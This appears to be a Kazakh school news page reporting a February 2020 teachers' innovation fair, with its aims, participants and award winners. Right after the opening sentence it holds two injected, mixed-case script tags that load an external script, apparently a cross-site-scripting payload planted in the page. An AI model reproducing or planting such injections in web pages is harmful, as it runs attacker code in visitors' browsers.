Мектепте 2020 жылдың ақпанның 08 күні «Идея бар» педагогикалық инновациялық әдістемелік жәрмеңке өткізілді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

10.02.2020

    Мақсаты:тұлғалық зияткерлікті дамытуға бағытталған заманауи озық педагогикалық идеяларды көпшілікке әйгілеу, дәріптеу, шығармашылықпен жұмыс істейтін және дарынды педагогтерді анықтау, өзекті және тиімді инновациялық педагогикалық тәжірибелерді аудандық, облыстық деңгейде тарату, педагогикалық қызметкерлердің кәсіби шеберлігін көтеруге бағдарланған білім беру үдерісін ұйымдастырудағы жаңа технологияларды қолдау және қоғамдағы білім беру басымдылықтарын бекіту, білім мазмұнын жаңарту және оның сапасын арттыру . 

 Міндеттері:

  •   мұғалімдердің өз іс тәжірибесін тиімді көрсетуіне және шығармашылық әлеуетін іске асыруына қажетті жағдай жасау;
  •   қызметкерлердің кәсіби деңгейін, педагогикалық шеберлігін  арттыру;
  •  мұғалімдердің білім беру мекемелері тәжірибесінде сабақтар мен оқу жұмыстарын

ұйымдастырудағы төлтума технологиялар мен әдістемелерді қолдануға, инновациялық әдістемелік амалдарды зерттеуге қызығушылығын қалыптастыруға жәрдемдесу;

  •   мектеп педагогтерінің кәсіби қарым-қатынас ауқымын кеңейту;
  •   сабақтар мен оқу жұмыстарының инновациялық әдістемелік нұсқалары дерекқорын толықтыру, жүйелеу және оларды келешекте аудандық, облыстық  білім беру мекемелері оқу үдерісіне енгізу.

Қатысушылар : физика пәнінің мұғалімі Оразбаева Б.М., математика пәнінің мұғалімдері Сүлеймэн Е.,Сейдахметова Р.К. орыс тілі және әдебиет пәнінің мұғалімі Муханжанова М.К., география пәнінің мұғалімі

Есенгулова Т.С., ағылшын тілінің мұғалімдері : Самурат Н., Варанкин Е.Ю.,бастауыш сынып мұғалімі Макишева К.Д.

      Әдістемелік іс-шараның нәтижесі: Алтын сертификат - математика пәнінің мұғалімі Сүлеймэн Е.,тақырыбы: «Математика пәні бойынша жиынтық бағалауды жоспарлау және ұйымдастыру, 5-8 сыныптар.Тапсырмалар меншешімдерінің жинағы», Күміс сертификат – ағылшын тілі мұғалімі Варанкин Е.Ю., тақырыбы : «Методический комплекс по английскому языку 1-4, 5-8 классы», Қола сертификат – Самурат Н., тақырыбы «Функционалды сауаттылықты арттыру».

Физика пәні мұғалімінің  «7 сыныпқа арналған практикалық жұмыстарының жинағы»тақырыбындағы  авторлық бағдарламасы Дипломмен марапатталды.

 

Тулегенова Г.К.

Просмотров: 608


Пікір қосу



Деректерді қолтаңбаға қосу